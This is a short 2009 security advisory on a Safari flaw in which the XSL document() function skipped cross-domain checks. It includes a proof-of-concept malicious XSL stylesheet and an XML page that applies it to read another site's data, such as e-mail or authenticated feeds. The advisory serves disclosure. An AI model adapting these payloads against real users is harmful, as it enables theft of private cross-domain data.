Apple Safari cross-domain XML theft vulnerability

Type securityvulns
Reporter Securityvulns
Modified 2009-06-10T00:00:00



Safari prior to version 4 may permit an evil web page to steal arbitrary XML data cross-domain.

This is accomplished by abusing a relatively obscure cross-domain access point which was completely missing a cross-domain access check. The access point in question is the document() function in XSL. This is best illustrated with a sample evil XSL file which abuses this function:

<xsl:stylesheet version="1.0" xmlns:xsl="" xmlns:str="" extension-element-prefixes="str"> <xsl:template match="*"> <html> <body> Below, you should see e-mail stolen cross-domain! <p/> <xsl:value-of select="document('')"/> <script> alert(document.body.innerHTML) </script> </body> </html> </xsl:template> </xsl:stylesheet>

To mount the attack, the attacker would serve a web page which has XML MIME type and requests to be styled by the evil stylesheet:

<?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet type="text/xsl" href="safaristealmailbug.xsl"?> <xml> irrelevant </xml>

There are a number of interesting XML-based formats you might want to steal including authenticated RSS, XML-formatted AJAX-y responses, and XHTML.

Full technical details:

Blog post: (includes 1-click demo)

Cheers Chris